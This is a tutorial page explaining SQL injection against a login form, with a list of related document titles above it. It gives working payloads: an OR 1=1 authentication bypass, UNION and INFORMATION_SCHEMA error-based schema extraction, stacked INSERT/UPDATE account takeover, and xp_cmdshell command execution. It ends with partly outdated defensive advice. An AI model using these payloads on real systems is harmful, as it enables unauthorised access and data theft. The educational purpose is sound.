Understanding Sql Injection



Similar documents
Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security

INTRODUCTION: SQL SERVER ACCESS / LOGIN ACCOUNT INFO:

Web Applications Security: SQL Injection Attack

SQL Injection for newbie

Testing Web Applications for SQL Injection Sam Shober

SQL Injection. Sajjad Pourali CERT of Ferdowsi University of Mashhad

How I hacked PacketStorm ( )

Maintaining Stored Procedures in Database Application

SQL Injection. SQL Injection. CSCI 4971 Secure Software Principles. Rensselaer Polytechnic Institute. Spring

SQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova

SQL Injection Vulnerabilities in Desktop Applications

Using SQL-server as database engine

SQL Injection Protection by Variable Normalization of SQL Statement

Serious Threat. Targets for Attack. Characterization of Attack. SQL Injection 4/9/2010 COMP On August 17, 2009, the United States Justice

SQL Injection January 23, 2013

CHAPTER 5 INTELLIGENT TECHNIQUES TO PREVENT SQL INJECTION ATTACKS

A SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks

USING MYWEBSQL FIGURE 1: FIRST AUTHENTICATION LAYER (ENTER YOUR REGULAR SIMMONS USERNAME AND PASSWORD)

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

Guarding Against SQL Server Attacks: Hacking, cracking, and protection techniques.

Webapps Vulnerability Report

White Paper. Blindfolded SQL Injection

ACCESSING IBM iseries (AS/400) DB2 IN SSIS

Connecting to Manage Your MS SQL Database

Release Notes For Versant/ODBC On Windows. Release

Troubleshooting guide for errors in Active Server Pages and Microsoft Data Access Components

Exposed Database( SQL Server) Error messages Delicious food for Hackers

Tutorial: How to Use SQL Server Management Studio from Home

How to Copy A SQL Database SQL Server Express (Making a History Company)

SQL Injection Attack Lab

A Tokenization and Encryption based Multi-Layer Architecture to Detect and Prevent SQL Injection Attack

Thick Client Application Security

Understanding Cross Site Scripting

ADO and SQL Server Security

Basic SQL Server operations

Define ODBC Database Library using Management Console

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

SECURING APACHE : THE BASICS - III

ecopy ShareScan 5.0 SQL installs guide

Accessing a Microsoft SQL Server Database from SAS on Microsoft Windows

Advanced Tornado TWENTYONE Advanced Tornado Accessing MySQL from Python LAB

Hacking Database for Owning your Data

Enhanced Model of SQL Injection Detecting and Prevention

Using the SQL Server Linked Server Capability

How to Use PIPS Access to/from SQL Database Utility Program. By PIPSUS Support Team Dr. Chouikha

Automating SQL Injection Exploits

MS SQL 2000 Server with CDR DICOM 3.5 and Recommended WAN Configuration

FmPro Migrator - FileMaker to SQL Server

Database Assistant. Once Database Assistant is installed you must login to gain access to the database. Copyright 2009

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

Video Administration Backup and Restore Procedures

How-To: MySQL as a linked server in MS SQL Server

ODBC Client Driver Help Kepware, Inc.

SQL Injection Attack Lab Using Collabtive

Technical Bulletin 005 Revised 2010/12/10

Agenda. SQL Injection Impact in the Real World Attack Scenario (1) CHAPTER 8 SQL Injection

SQL Server An Overview

MapReduce. MapReduce and SQL Injections. CS 3200 Final Lecture. Introduction. MapReduce. Programming Model. Example

WebCruiser Web Vulnerability Scanner User Guide

Knocker main application User manual

Setting Up ALERE with Client/Server Data

SQL Injection Are Your Web Applications Vulnerable?

SQL Injection. By Artem Kazanstev, ITSO and Alex Beutel, Student

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

PHP/MySQL SQL Injections: Understanding MySQL Union Poisoining. Jason A. Medeiros :: CEO :: Presented for DC619 All Content Grayscale Research 2008

Blindfolded SQL Injection. Written By: Ofer Maor Amichai Shulman

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

Using ODBC with MDaemon 6.5

FREQUENTLY ASKED QUESTIONS

National Fire Incident Reporting System (NFIRS 5.0) Configuration Tool User's Guide

ODBC Driver Version 4 Manual

Role Based Access Control. Using PHP Sessions

BLIND SQL INJECTION (UBC)

How To Create A Database Driven Website On A Computer Or Server Without A Database (Iis) Or A Password (Ict) On A Server (Iip) Or Password (Web) On An Anonymous Guestbook (Iit) On Your

SQL INJECTION TUTORIAL

Connect to a SQL Database with Monitouch

Manipulating Microsoft SQL Server Using SQL Injection

Migration Manager v6. User Guide. Version

The manual contains complete instructions on 'converting' your data to version 4.21.

External Network & Web Application Assessment. For The XXX Group LLC October 2012

Using Temporary Tables to Improve Performance for SQL Data Services

Using SQL Server Management Studio

CB Linked Server for Enterprise Applications

CIMHT_006 How to Configure the Database Logger Proficy HMI/SCADA CIMPLICITY

Concepts Design Basics Command-line MySQL Security Loophole

Security and Control Issues within Relational Databases

A Brief Introduction to MySQL

CTF Web Security Training. Engin Kirda

How to gain direct access to SQL Server at Garching via SSH

AUTHENTICATION... 2 Step 1:Set up your LDAP server... 2 Step 2: Set up your username... 4 WRITEBACK REPORT... 8 Step 1: Table structures...

Chapter 4 Accessing Data

A table is a collection of related data entries and it consists of columns and rows.

Check list for web developers

Getting started with OWASP WebGoat 4.0 and SOAPUI.

EASRestoreService. Manual

Transcription:

Understanding Sql Injection Hardik Shah

Understanding SQL Injection Introduction: SQL injection is a technique used by a malicious user to gain illegal access on the remote machines through the web applications vulnerability. The basic idea behind this technique is to run the sql query which was not intended to run by a programmer. This technique is heavily relay on the logical operations like AND, OR.UNION etc. if this technique is used properly a malicious user can get complete access on a web server. If the application is creating SQL strings naively on the fly (dynamic queries) and then running them, it can create some real surprises as we see later on. How it performed: This vulnerability occurs due to lack of proper validation of user entered data in web applications. It may be possible that the programmer is a newcomer and has lack of understanding of such kind of attacks. But in many cases I have seen most of the time programmers are too lazy to consider and apply proper security checks. Most of the programmer believes that client or end user will always give correct input to the application. They even check for some minor validations like empty string or null values etc but they never think of the fact that a user can insert a specially crafted query which reveals all the important information of your machines. With the outsourcing boom many companies started and they have less experienced programmer so such kind of attacks heavily exists in today s web applications. If we take a simple example of a login page, then generally programmer s uses this pseudo code (assume that the database server is MS Sql server): query="select * from userinfo where username='"&struser&"' and password='"&strpass&"'" strcheck=getqueryresult(query) if strcheck="" then bool loginflg=false else bool loginflg=true end if

This query works fine without any problems if user enters correct characters. But suppose a malicious user enter following: password='or 1=1 Now the above query will become: query="select * from userinfo where username='t est' and password='' 1=1 '" or Symbol denotes the comment in sql server. Hence in the MS Sql server everything after the is ignored. So this query is actually becomes something like this: select * from userinfo where username='test'and password=''or 1=1 We can break this query in two portions like bellow: p=>username='t est' and password= ' q=>1=1 So we can write it as pvq Now from the Boolean algebra we know that in V(OR) operation the result will be true if any of the value is true. As here the value of q is always true as 1 is always equal to 1, hence the value of this entire expression(pvq) is always returned as TRUE. So the query becomes (I replaced with p, q for ease of reading) query="select * from userinfo where pvq" Now as discussed above the pvq is always true hence the query will select all the records in the current table. But generally programmer takes one record for login hence the username becomes the username of the first record. Consider following table: No. username password 1 test test

2 temp temp In this table if above query is executed then username becomes test. Hence on executing the above malformed query a malicious user can bypass authentication mechanism of the web application. But this is only one thing among several endless options which an intruder can use. By using specially crafted query a user can retrieve the entire database schema of your application or he can upload/download any file or he can get any other info such as credit card numbers stored in the database, can delete the user, add new user etc. Different types of attacks: 1) SELECT UNION: Union operation permits combining two results. So by using this option a user can retrieve any sensitive information from the database. In case of the above query we mentioned suppose a user enters following in the userid and password field: password='or 1=1 union select top 1 TABLE_NAME from INFORMATION_SCHEMA.TABLES On execution of this query the database engine will give an error something like this: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'userinfo'to a column of data type int. /testpage.aspx, line 25 Now from the above mentioned error it is clear that the table name is userinfo. After determining the table name user need to find the column name in the table. So he can enter following values: password='or 1=1 union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='userinfo' Output

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logi n_id' toa column of data type int. /testpage.aspx, line 25 The above error message shows that the first field or column in userinfo is login_id. To get the next column name will type password='or 1=1 union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='userinfo'where COLUMN_NAME not in('login_id') Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logi n_name' o t a column of data type int. /testpage.aspx, line 25 so by using this a user can gain the information about the tables,username,passwords etc. 2)SELECT INSERT: With the insert keyword a user can easily add new records in the database. Given that we know the partial structure of the members table, we can try adding a new record to the table: if this works, we'llsimply be able to login directly with our newlyinserted credentials. Look at the following query: SELECT email, passwd, login_id, full_name FROM members

WHERE email = 't est@test.com'; INSERT INTO members ('email','p asswd','l ogin_id','full_name') VALUES ('test@test.com','h ello','te st',' test'); '; based on the implementation and database permissions this query may work and one can login by using his user name "test" and password "test. Thi s might failed as suppose there is a different table which contains access right to the user and other stuff or may be the web application user doesn t have insert permission on user table. 3) Select Update: As discussed above some times the select insert may fail depending on various conditions. In that case using the forgot password button seems a nice way to getting in to the system. SELECT email, passwd, login_id, full_name FROM members WHERE email = 't est@test.com'; UPDATE members SET email = 'malicious_user_mail@mail.com' WHERE email = 't est@test.com'; This are the genral techniques used. but based on the combination of the various sql keywords say "LIKE","CREATE","DROP","WHERE" etc one can perform various different kind of attacks. Built In Stored Procedure: Another technique in case of sqlserver is of using sql server s stored procedure. A default installation of sql server contains many stored procedure which a malicious user can easily misuse. Some of them are: xp_cmdshell Microsoft's SQLServer supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the web server is possible.

if xp_cmdshell is enabled then a malicious user can run any arbitery command on the web server. Although Access to xp_cmdshell is usually limited to administrative accounts, but it's possibl e to grant it to lesser users. not to mention many sql server installation runs with default user sa and blank password. How to save web applications from sql injection attacks: You can see this attacks works on many sites easily. There are many programmers who never validate the data properly. If you are a web application developer thenyoumust need to secure your application from such attacks.following are the proposed solutions by which you can avoid such attacks; 1) Data santinization: we need to remove any unwanted characters say ', ", ;, or from the user input. Allowing this character may allow sql injection attacks on your website. But some times you need to allow certain special character say ' like name can be O'Reilly. 2) Limit database permissions: we also need to make sure that we give only necessary permission to the user. Allowing unrestricted access to the user may cause trouble as we discussed above a malicious user can use built in stored procedure to perform the attacks. 3) Use stored procedure: if possible, use properly formatted stored procedure instead of using dynamic queries in your web applications. It will reduce the chance of such attacks. 4) Use quote function: we can use built in functions like magic_quote in case of PHP to properly format the user input. This will prevent such attacks. Hardik Shah

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information